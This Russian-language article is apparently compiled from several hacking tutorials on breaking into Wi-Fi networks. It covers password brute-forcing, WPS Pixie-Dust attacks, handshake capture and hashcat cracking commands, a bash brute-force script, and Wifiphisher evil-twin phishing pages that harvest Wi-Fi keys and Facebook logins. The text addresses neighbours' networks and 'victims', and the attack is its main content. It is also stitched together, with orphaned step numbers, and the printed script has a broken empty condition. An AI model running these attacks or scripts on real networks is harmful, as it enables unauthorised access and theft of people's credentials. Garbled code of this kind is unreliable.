Как взломать wps wifi-роутеров разными способами

Брутфорс

Брутфорс – это банальный подбор всех возможных комбинаций символов, из которых может состоять пароль. Это, пожалуй, самый простой способ, который только можно придумать, поскольку тут не нужны особенные знания или сложное программное обеспечение. Но, с другой стороны, сложность способа заключается в том, что это достаточно муторно и процесс может занять очень много времени, если хозяин установил достаточно сложный пароль.

Подбираем пароль из всех возможных комбинаций символов, которые он может содержать

  1. Для начала попробуйте самые распространенные пароли. Банальные 12345678 и qwertyui устанавливаются достаточном большим количеством пользователей и вполне вероятно, что у вашего соседа установлен один из таких. Также можете подумать, какой пароль установили бы сами. А если вы хорошо знакомы с хозяином роутера, можно попробовать дату его рождения или какую-либо другую значимую для него комбинацию символов.

    Список часто используемых паролей

  2. Если не один из самых простых и вероятных паролей не подошел, придется последовательно подбирать различные комбинации символов. Конечно, можно делать это все вручную, но страшно представить, сколько на это уйдет времени. Кроме того, пока вы вручную переберете хотя бы десятую часть возможных вариантов, никуда подключаться уже не захочется.

Автоматический подбор комбинаций

Не обязательно проводить эту операцию вручную. Есть достаточно много программ, которые автоматически последовательно подбирают комбинации. Это гораздо быстрее и проще для пользователя. Но стоит иметь в виду, что поиск подходящей комбинации может занять достаточно долгое время, даже если использовать специальное программное обеспечение. Простой пароль вроде qwertyui можно взломать меньше чем за минуту, а вот на расшифровку /#7&//.’ уйдет очень много времени.

Для автоматического подбора паролей от Wi-Fi используем программу WiFi Crack

WiFi Crack

Одна из программ для автоматического подбора паролей — WiFi Crack. Пользоваться ей очень легко.

  1. Скачиваем программу с любого сайта, распространяющего подобный софт.
  2. Запускаем файл и видим перед собой простой интерфейс.

    Интерфейс программы WiFi Crack.jpg

  3. Вверху в строке «Refresh» выбираем сеть, которую необходимо взломать и активируем программу нажатием кнопки «Scan for Access points».

    В строке «Refresh» выбираем сеть, нажимаем кнопку «Scan for Access points»

  4. Ожидаем завершения процесса сканирования сетей, щелкаем по активной кнопке, в нашем случае «Wi-Fi WPA», со списком найденных сетей.

    Нажимаем кнопку «Wi-Fi WPA»

  5. В разделе «Select Target Access Point» щелкаем по нужной сети.

    Щелкаем по нужной сети левой кнопкой мышки в разделе «Select Target Access Point»

  6. В нижней части окна кликаем по кнопке «Browse», что бы выбрать файл со словарем возможных паролей.

    Щелкаем по кнопке «Browse»

    Открываем папку с файлом, щелкаем по нему левой кнопкой мышки, нажимаем «Open»

  7. Настроив параметры, нажимаем кнопку «Wi-Fi Attack» и ждем завершения процесса.

    Щелкаем по кнопке «Wi-Fi Attack»

  8. Конечным результатом работы программы станет надпись с паролем под строчкой «Finished» в самом низу окна.

    Под строчкой «Finished» находим пароль от выбранной сети

  9. Возвращаемся в интерфейс программы и щелкаем по кнопке «Key Database».

    В главном окне программы щелкаем по кнопке «Key Database»

  10. В открытом окне вы увидите информацию по подключению, включая пароль от Wi-Fi.

    Изучаем информацию по выбранному подключению, в поле «Key» находится пароль

Что Вам Понадобится Для Взлома

Для демонстрации атаки WPS Pixie-Dust мы выбрали фреймворк по аудиту беспроводных сетей под названием Airgeddon. Интегрирование большого количества инструментов для взлома в одно место хорошо подходит для начинающих, Airgeddon позволит вам выбрать и настроить вашу беспроводную карту, найти и загрузить привязку данных из ближайших сетей, атаковать выбранные сети – и все это в одном фреймворке.

При использовании Airgeddon’а есть некоторые нюансы: в промежутке между модулями разведки и атаки от вас требуется готовность открыть несколько окон терминала в GUI рабочего стола. Если вы используете SSH, чтобы получить доступ к вашему Kali устройству, то скорее всего вам понадобится выбрать уязвимые сети, используя команду wash, встроенную в Reaver, и вручную загрузить данные в Bully.

В отличии от Reaver и Bully, с которыми разные беспроводные карты работают по-разному (с чем-то лучше, с чем-то хуже), Airggedon позволяет вам загружать цельные данные между двумя скриптами и помогает найти то самое местечко для вашей беспроводной карты, учитывая используемый модуль атаки и цель, которую вы атакуете.
Для использования модуля Bully в Airgeddon требуется работать с Kali Linux или с другого поддерживающего дистрибутива. Перед началом убедитесь, что ваш Kali Linux полностью обновлен, так как вам потребуется установка нескольких пакетов для работы.

Вам также потребуется беспроводной сетевой адаптер пригодный для пакет-инъекций и для режим беспроводного мониторинга. Мы рекомендуем Panda PAU09.
И наконец, убедитесь, что у вас есть разрешение от владельца сети, на которой вы собираетесь испытывать фреймворк. Этот инструмент может работать очень быстро, так что если сеть просматривается, то вы оставите следы в логах.

inSSIDer

Расстроенный тем фактом, что Netstumbler не развивался несколько лет и не работает Вистой и даже 64-битной XP, Charles Putney решил написать свою собственную утилиту для поиска Wi-fi сетей, после чего опубликовал исходники на известном портале The Code Project. Идею подхватил Norman Rasmussen, после чего на свет появилась новая версия inSSIDer‘а, построенная на базе Native Wi-Fi API. Инсайдер подобно Netstumbler использует активные методы сканирования, а всю найденную о точках доступа информацию отображает в табличке, сдабривая данные красивыми графиками уровня сигнала. Тулза очень простая — ничего лишнего, но я нередко использую именно ее для поиска Wi-Fi спотов и определения используемой ими защиты.

Быстрый брут-форс пароля

К сожалению, точек доступа с включённым WPS не особо много. Тем не менее мы ещё вернёмся к ним. Сейчас мы рассмотрим классический вариант захвата рукопожатия и взлома пароля. Его быстрота заключается в следующем:

  • выполняется автоматический захват рукопожатий для всех Точек Доступа в пределах досягаемости
  • запускается два вида брут-форса с Hashcat: по словарю и по маске в восемь цифр. Опыт показывает, довольно много ТД поддаются. У этого способа тоже хорошее соотношение затрат времени к получаемому результату

Переводим беспроводной интерфейс в режим монитора.

Запускаем команду для сбора рукопожатий:

sudo besside-ng ИНТЕРФЕЙС -W

Все рукопожатия будут сохранены в файл wpa.cap.

Если вы собираетесь взламывать их все, то можно все разом конвертировать в формат hashcat с помощью :

cap2hccapx wpa.cap output.hccapx

Если вам нужны только хеш определённой Точки Доступа, то в качестве фильтра используйте имя сети (ESSID). К примеру, меня интересует только рукопожатие Wi-Fi сети netis56 и я хочу сохранить его в файл netis56.hccapx:

cap2hccapx wpa.cap netis56.hccapx netis56

Если хотите файл wpa.cap разбить на отдельные рукопожатия, то используйте скрипт из статьи «Как извлечь рукопожатия из файла захвата с несколькими рукопожатиями», а затем также конвертируйте их программой cap2hccapx.

Для атаки по словарю я использую словарь rockyou, очищенный вариант можно скачать по этой ссылке.

Пример удачного взлома по словарю (время взлома 9 секунд):

Ещё один пример удачного взлома по словарю (время взлома 13 секунд):

Моя команда для запуска:

hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 0 'ХЕШ.hccapx' /ПУТЬ/ДО/rockyou_cleaned.txt

В этой команде обязательные опции:

  • ‘ХЕШ.hccapx’ — ваш файл hccapx с одним или более хешей
  • /ПУТЬ/ДО/rockyou_cleaned.txt — путь до словаря
  • -m 2500 — указан тип взламываемого хеша

Необязательные опции:

  • -a 0 — тип атаки: атака по словарю. Можно пропустить, т. к. подразумевается по умолчанию
  • -D 1,2 — означает использовать и центральный процессор и видеокарту для взлома пароля. Если не указать, скорее всего будет выбрана только видеокарта
  • —force — означает игнорировать предупреждения. У меня без этой опции не задействуется центральный процессор для взлома паролей. Будьте осторожны с этой опцией
  • —hwmon-temp-abort=100 — это максимальная температура, при которой брут-форс будет принудительно прерван. У меня такой климат, что днём в комнате всегда больше +30℃, к тому же, я запускаю брут-форс на ноутбуке (не рекомендую это делать на ноутбуке!!!), поэтому в моих условиях дефолтный барьер в +90℃ достигается очень быстро и перебор останавливается. Этой опцией, установленной на температуру выше дефолтных 90, можно реально сжечь свой комп/видеокарту/лэптоп. Используйте исключительно на свой страх и риск — Я ВАС ПРЕДУПРЕДИЛ!!! Хотя на практике у меня температура доходит до 94-96 и затем видеокарта сбрасывает частоты — видимо, у неё тоже есть свой лимит.

Для запуска атаки по маске:

hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 3 'ХЕШ.hccapx' ?d?d?d?d?d?d?d?d

Из нового в этой команде:

  • ?d?d?d?d?d?d?d?d — маска, означает восемь цифр, на моём железе перебирается примерно минут за 20. Для создания маски в больше количество цифр, добавляйте ?d.
  • -a 3 — означает атаку по маске.

Кроме паролей в 8 цифр, также распространены пароли в 9-11 цифр (последние чаще всего являются номерами телефонов, поэтому можно указывать маску как 89?d?d?d?d?d?d?d?d?d), но каждая дополнительная цифра увеличивает время перебора в 10 раз.

Похожие программы

WiFi WPS Unlocker не является чем то уникальным, ведь можно просто вбить слово «WPS» в Play Market, как похожих приложений найдется огромное множество, но из тех, кто может потягаться на равных или даже превзойти это приложение, очень мало.

Выделить стоит только программу «WiFi warden». Можно даже сказать, что они ничем друг от друга не отличаются в плане функционала. кроме нескольких отличий:

  • Русский интерфейс;
  • Программа полностью бесплатна;
  • Доступна на версиях андроид 2.2 и выше (9 версия включительно).

Конечно заманчиво взломать соседскую точку доступа и лазить в интернете бесплатно, но стоит понимать, что это незаконно и если вас поймают на этом, то с соседями можно испортить отношения надолго, если не навсегда.

Шаг 7: Запуск атаки & Взлом WPS PIN

После того, как вы запустите модуль атаки, откроется окно с красным текстом. Если соединение успешно, то вы увидите много зашифрованных транзакций, как на картинке ниже. Если вы вне зоны действия или цель на самом деле без уязвимости, то вы увидите неудавшиеся транзакции.
Как только Bully получит необходимые данные для взлома PIN, он перенаправит его в программу WPS Pixie-Dust.

Это может случиться в считанные секунды, а то и быстрее. Но если у вас слабое соединение, то это может занять и несколько минут. Вы увидите взломанный PIN и пароль от Wi-Fi внизу экрана. Вот и оно! Вы получили доступ к маршрутизатору.
Если вы запишите PIN, то сможете увидеть модуль «Custom PIN association», который позволит вам получать вновь измененный пароль в любое время до тех пор, пока жертва не купит новый роутер или не отключит WPS. Он также работает в том случае, если вы получили PIN, но забыли сбросить данные роутера.

Для Windows

Не люблю Windows, но у обычного человека дома стоит именно она. Я все еще настаиваю ознакомиться с той статьей, которая была предложена в начала и изучить основные методики взлома. Тем же, кому лень учиться, предлагаю следующие программы, но успех здесь будет без теоретической подготовки навряд ли.

Упомянутый Aircrack-ng тоже можно скачать для винды, отдельно его вставлять сюда не буду. А вот и его графический интерфейс:

Dumpper

Самое популярное приложение у скрипт-киди. По сути отображает интерфейс, имеет возможность тестирования WPS по умолчанию. Никакой магии здесь нет, уровень для новичков. Эти же новички нередко и расстраиваются от ее использования, и прекращают изучение истинных способов – программа работает лишь для небольшой подборки роутеров, да и то на которых владелец ничего не менял. Так что взломать все не получится только с ее помощью.

Сама программа Dumpper содержит пароли, но в комплекте обычно еще идет утилита JumpStart, которое делает непосредственно подключение по предложенному программой паролем. Чтобы стало понятно, посмотрите видео по подробной процедуре взлома:

CommView for WI-FI

Классическая программа для перехвата пакетов, деаутентификации юзеров сети, применяемая для дальнейшей расшифровки хэндшейка. Приятный графический интерфейс. На видео ниже показано ее взаимодействие с Aircrack-ng:

https://youtube.com/watch?v=wqomNNNEbgY

Elcomsoft Wireless Security Auditor

Платная программа для аудита безопасности Wi-Fi. Тоже своеобразный комбайн, альтернатива Аиркрэку, но только под Windows. Применяется для взлома паролей на всех векторах. Умеет делать почти все то же самое. Но – ПЛАТНАЯ. Знающие найдут способ познакомиться с этой программой, а вот другим предлагаю просто посмотреть на функционал этого взломщика вафли на ПК:

Для Android

Небольшая подборка приложений для взлома вайфая на Андроиде. На самом деле эти программы не могут сделать что-то такое, что делали программы для ПК. Основное их предназначение – или поиск занесенного в общие базы пароля, или же базы паролей по умолчанию от WPS. Но зато можно спокойно ходить по городу и проверять сети с помощью своего телефона. Производительность здесь не главное.

WIBR+

Программа для брутфорса паролей. Да, как это было бы ни странно, но она именно брутит ключи доступных точек доступа WEP/WPA/WPA2. Но есть и минус – издержки системы Android дают на выходе что-то около 8 ключей в минуту, а это не есть хорошо в промышленном взломе. Как побаловаться или для теста на известном пароле своего роутера, самое оно. Есть режим чистого брута на сгенеренных паролях и атака по подготовленному словарю.

WPS Connect

Главное направление приложения – попытка подключения к роутерам с паролями WPS по умолчанию. Может предлагать несколько возможных паролей, можете сами ей дать попробовать свой. Еще один функционал – вытаскивает пароли к сохраненным точкам доступа, к которым ранее подключался ваш смартфон.

Брутфорс Wi-Fi без захвата рукопожатий

Переходим, собственно, к брутфорсу.

Давайте попробуем подключиться с заведомо неверным паролем:

$ sudo wpa_supplicant -i wlp2s0 -c wpa_Kitty.conf
Successfully initialized wpa_supplicant
wlp2s0: SME: Trying to authenticate with 40:3d:ec:14:c8:68 (SSID='Kitty' freq=2412 MHz)
wlp2s0: Trying to associate with 40:3d:ec:14:c8:68 (SSID='Kitty' freq=2412 MHz)
wlp2s0: Associated with 40:3d:ec:14:c8:68
wlp2s0: CTRL-EVENT-DISCONNECTED bssid=40:3d:ec:14:c8:68 reason=15
wlp2s0: WPA: 4-Way Handshake failed - pre-shared key may be incorrect
wlp2s0: CTRL-EVENT-SSID-TEMP-DISABLED id=0 ssid="Kitty" auth_failures=1 duration=10 reason=WRONG_KEY

Отлично, если пароль неверный, то в выводе присутствует строка WRONG_KEY. Отфильтруем вывод:

sudo wpa_supplicant -i wlp2s0 -c wpa_Kitty.conf | grep 'WRONG_KEY'

Давайте создадим тестовый словарик:

maskprocessor pass?d?d?d?d > dict.txt

И куда-нибудь в нём вставим правильный пароль.

Теперь набросаем скриптик для автоматизации процесса (сохраните его в файл brut_wpa.sh):

#!/bin/bash

FILE='dict.txt';
AP='Kitty';
Interface='wlp2s0';

while read -r line 
echo 'Тестируем пароль: '$line          
do
	wpa_passphrase $AP $line > wpa_$AP.conf
	t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'WRONG_KEY'`
	if 
	then
		echo 'Пароль подобран. Это: '$line
		exit
	fi	
done <$FILE

Запускать так:

sudo sh brut_wpa.sh

Правильный пароль я разместил почти в самое начало, поэтому результат получил быстро:

Давайте рассмотрим скрипт поподробнее. Здесь в строках

FILE='dict.txt';
AP='Kitty';
Interface='wlp2s0';

Указываются, соответственно, файл словаря, название ТД и имя беспроводного интерфейса.

Используется сброс по таймауту timeout 4. Если уменьшать эту величину, то увеличивается вероятность ложных срабатываний. Если увеличивать, то уменьшается скорость перебора.

Кстати, ещё можно анализировать результаты не по ошибкам подключения, а искать удачные подключения:

sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'completed'`

Тогда скрипт приобретает вид:

#!/bin/bash

FILE='dict.txt';
AP='Kitty';
Interface='wlp2s0';

while read -r line 
echo 'Тестируем пароль: '$line          
do
	wpa_passphrase $AP $line > wpa_$AP.conf
	t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'completed'`
	if 
	then
		echo 'Пароль подобран. Это: '$line
		exit
	fi	
done <$FILE

Скрипт хорошо работает:

Скорость аналогичная, но из-за проблем у ТД можно пропустить валидный пароль. С первым скриптом валидный пароль пропустить нельзя — но возможно ложное срабатывание на невалидный пароль.

Величину таймаута рекомендуется тестировать — вполне возможно, что для ТД, которую вы брутфорсите, оптимальной величиной будет не 4 секунды, а какое-то другое число.

Установка и запуск Wifiphisher

Теперь Wifiphisher имеется в стандартных репозиториях Kali Linux и BlackArch, поэтому установку можно выполнить в одну команду.

Установка в Kali Linux

sudo apt-get install wifiphisher hostapd dnsmasq python-pyric python-jinja2

Установка в BlackArch

sudo pacman -S wifiphisher dnsmasq hostapd net-tools python2-pyric python2-j2cli --needed

Хотя Wifiphisher делает все необходимые настройки и переводит нужный интерфейс в режим монитора, он не выгружает Network Manager, который может сказаться на успешность атаки. Рекомендуется сделать это вручную:

sudo systemctl stop NetworkManager

Запустите программу с правами администратора:

sudo wifiphisher

При старте программы вы можете увидеть сообщение:

There are not enough wireless interfaces for the tool to run! Please ensure that at least two wireless adapters are connected to the device and they are compatible (drivers should support netlink). At least one must support Master (AP) mode and another must support Monitor mode.

Otherwise, you may try —nojamming option that will turn off the deauthentication phase.

Сообщение гласит:

Недостаточно беспроводных интерфейсов для запуска инструмента! Пожалуйста, убедитесь, что подключено по крайней мере два устройства и что они являются совместимыми (драйвер должен поддерживать netlink). По крайней мере один должен поддерживать Мастер режим (AP), а другой должен поддерживать режим Монитора.

В противном случае вы можете попробовать опцию —nojamming, которая отключит фазу деаутентификации.

Если с вашими Wi-Fi адаптерами всё в порядке, то появится такое окно:

В нём выберите (стрелочками вверх-вниз) беспроводную сеть для атаки и нажмите ENTER. Чтобы выйти нажмите ESC.

Вам на выбор будут предложены фишинговые сценарии:

Доступные фишинговые сценарии:

1 — Страница обновления прошивки

Страница конфигурации роутера без логотипов и брендов, спрашивает WPA/WPA2 пароль для обновления прошивки. Также адаптирована для мобильных телефонов.

2 — Менеджер сетевых соединений

Имитирует поведение менеджера сетей. Этот шаблон отображает страницу Chrome «Connection Failed» и показывает окно менеджера сетей поверх страницы, который спрашивает ключ от Wi-Fi. В настоящее время поддерживаются менеджеры сетей Windows и MAC OS.

3 — Страница входа Oauth

Бесплатная Wi-F служба спрашивает учётные данные Facebook для аутентификации с использованием OAuth

4 — Обновление плагина браузера

Страница обновления браузера плагина, которая может использоваться для доставки полезной нагрузки жертве.

Введите номер сценария, который вы хотите использовать. Начнём с первого.

Жертва будет видеть две ТД с одинаковыми именами. Причём к оригинальной (которая с паролем) подключиться невозможно. Вторая (Злой Двойник) позволяет подключиться без пароля.

Атакующий в это время видит:

Строка deauthenticating clients показывает клиентов, для которых глушиться Wi-Fi (т. е. создаётся препятствие для подключения к оригинальной точке доступа). А строка DHCP Leases показывает тех, кто уже подключился к Злому Двойнику. HTTP requests показывает запросы, которые были сделаны клиентами.

При попытке открыть любой сайт клиент видит сообщение о необходимости обновить прошивку роутера.

После ввода пароля запускается достаточно долгий процесс «обновления»:

Вторая стадия «обновления»:

А атакующий видит:

Бордовым цветом выделены отправленные данные.

Для прекращения атаки нужно нажать CTRL+c. Если учётные данные были успешно захвачены, то будет выведено примерно следующее сообщение:

 Captured credentials:
u'wfphshr-wpa-password=pattayateaam'

При втором сценарии жертве выводится такой запрос для ввода пароля:

А при третьем сценарии для доступа к открытой точке доступа просят ввести логин и пароль от Facebook:

Решение проблем

1. Бесконечная ошибка Association failed

Иногда при атаках у меня появлялись бесконечные сообщения:

 Associating with AP...
 Association failed.
 Associating with AP...
 Association failed.

Если остановить и повторно запустить атаку, то данная ошибка обычно исчезала.

2. Вкладка Wireless Networks не работает в Linux

Вкладка Wireless Networks не работает и никогда не будет работать в Linux, поскольку для данной функциональности в Router Scan требуется WinPcap или Npcap, которые в Linux отсутствуют.

3. Npcap установлен, но всё равно ошибка «Please install WinPcap and try again»

Если вы уже установили Npcap или установили Wireshark, но всё равно получаете ошибку:

 Raw packet capture not available.
 Please install WinPcap and try again.

То причина может быть в том, что вы забыли включить галочку «Install Npcap in WinPcap API-compatible mode». Заново запустите установщик Npcap и включите эту опцию.

4. Не работают беспроводные атаки в Router Scan

Если у кого-то перестали работать беспроводные атаки Router Scan, то теперь появилось исправление.

В беспроводных атаках Router Scan очень сильно полагается на WinPcap/Npcap. В истории изменений Npcap (https://github.com/nmap/npcap/blob/master/CHANGELOG.md) мы можем увидеть следующее:

Npcap 1.30

Restore raw WiFi frame capture support, which had been broken in a few ways since Npcap 0.9983. Additional improvements enable PacketSetMonitorMode() for non-admin-privileged processes, allowing Wireshark to correctly enable monitor mode via checkbox without requiring WlanHelper.exe.

Перевод:

Восстановлена поддержка захвата сырых кадров WiFi, которая была поломана сразу несколькими способами с момента выхода Npcap 0.9983. Дополнительные улучшения включают PacketSetMonitorMode() для процессов без прав администратора, что позволяет Wireshark правильно включать режим мониторинга с помощью флажка, не требуя WlanHelper.exe.

Короче говоря, функциональность связанная с беспроводными атаками уже давно и сильно была сломана. Теперь они её починили — я проверил, атака на WPS прошла успешно.

Поэтому просто обновите Npcap до последней версии. Либо установите Wireshark последней версии — вместе с ней поставляется и Npcap.

Что нужно для использования возможностей беспроводного аудита Router Scan?

Программы

Если при попытке использования функций беспроводного аудита вы увидели сообщения:

 Raw packet capture not available.
 Please install WinPcap and try again.

Оборудование

Для подбора WPA-PSK ключа (проще говоря, пароля от Wi-Fi сети) должна подойти любая Wi-Fi карта, поскольку принцип работы программы заключается в том, что пробуется подключение с паролями из словаря, а подключаться к беспроводной точке доступа умеет любой Wi-Fi адаптер. Если у вас их несколько, то предпочтение следует отдать тому, который видит больше сетей и лучше держит сигнал.

В атаках на WPS ПИН при использовании Alfa AWUS036NHA я получал сообщение об ошибке:

 Failed to start raw packet capture.
 Try updating your Wi-Fi driver and/or installing Npcap in WinPcap-compatible mode.

Т.е. не получается запустить захват сырых пакетов, попробуйте обновить ваш Wi-Fi драйвер и/или установить Npcap в WinPcap-совместимом режиме.

Поскольку WinPcap состоит в том числе из драйвера, не удивлюсь если для атак на WPS ПИН подойдут даже те беспроводные карты, которые непригодны для использования в аудите Wi-Fi в Linux из-за ограничений драйверов. Не могу это проверить, т.к. под рукой нет «просто» Wi-Fi   адаптера.

Настройка Router Scan

На чем брутить пароли Wi-Fi?

Локально перебирать пароли лучше на десктопном компе с мощной видюхой, а если его нет, воспользуйся онлайновыми сервисами. Бесплатно в них предлагаются ограниченные наборы, но даже их порой достаточно.

Взлом двух паролей онлайн

Еще один интересный вариант — использовать сеть распределенных вычислений. Сделать это позволяет, например, Elcomsoft Distributed Password Recovery. Эта универсальная программа понимает десятки форматов паролей и хешей, включая .cap, .pcap и .hccapx. Над одной задачей в ней одновременно могут работать до десяти тысяч компьютеров, объединяя ресурсы своих процессоров и видеокарт.

Распределенный брут хешей WPA

Плюс у нее очень продвинутый подход к словарной атаке. Можно использовать маски, приставки и мутации, фактически расширяя объем словаря в несколько раз.

Почему выполняют атаку по словарю вместо брута?

Ключ WPA(2)-PSK генерируется длиной 256 бит. Число возможных комбинаций (2^256) таково, что даже на мощном сервере с графическими ускорителями потребуются годы для их перебора. Поэтому реалистичнее выполнить словарную атаку.

Обычно Wifite2 делает это сам. После захвата хендшейка он проверяет его качество. Если все нужные данные в нем сохранились, то автоматически запускается атака по словарю . Как нетрудно догадаться, в нем всего 4800 самых распространенных паролей.

Он удобен тем, что быстро срабатывает даже на стареньком ноутбуке, однако с большой вероятностью искомой комбинации в этом словаре не будет. Поэтому стоит сделать свой.

Как составить свой словарь?

Сначала я собрал коллекцию словарей из разных источников. Это были предустановленные словари в программах для перебора паролей, каталог в самой Kali Linux, базы утекших в Сеть реальных паролей от разных аккаунтов и подборки на профильных форумах. Я привел их к единому формату (кодировке), используя утилиту recode. Дальше переименовал словари по шаблону , где ## — счетчик из двух цифр. Получилось 80 словарей.

Объединяем 80 словарей, пропуская одинаковые записи

На следующем этапе я объединил их в один, удалив явные повторы, после чего запустил утилиту PW-Inspector для очистки объединенного словаря от мусора. Поскольку пароль для Wi-Fi может быть от 8 до 63 символов, я удалил все записи короче 8 и длиннее 63 знаков.

Затем я подумал, что получился слишком здоровый файл, который можно сократить сильнее без явного ущерба для эффективности перебора. Ты видел в реальной жизни пароли Wi-Fi длиннее 16 символов? Вот и я не видел.

На файлообменнике Кима Доткома можно (647 Мб в ZIP-архиве, 2,8 Гб в распакованном виде).

Перевод беспроводной карты в режим монитора

Для поиска сетей с WPS, а также для атаки на них нам понадобиться перевести Wi-Fi карту в режим монитора.

Закрываем программы, которые могут помешать нашей атаке:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

Узнаём имя беспроводного интерфейса:

sudo iw dev

И переводим его в режим монитора (замените wlan0 на имя вашего интерфейса, если оно отличается):

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

Новый сетевой интерфейс в режиме монитора также называется wlan0.

Если у вас другое имя беспроводного сетевого интерфейса, то во всех последующих командах вставляйте его вместо wlan0.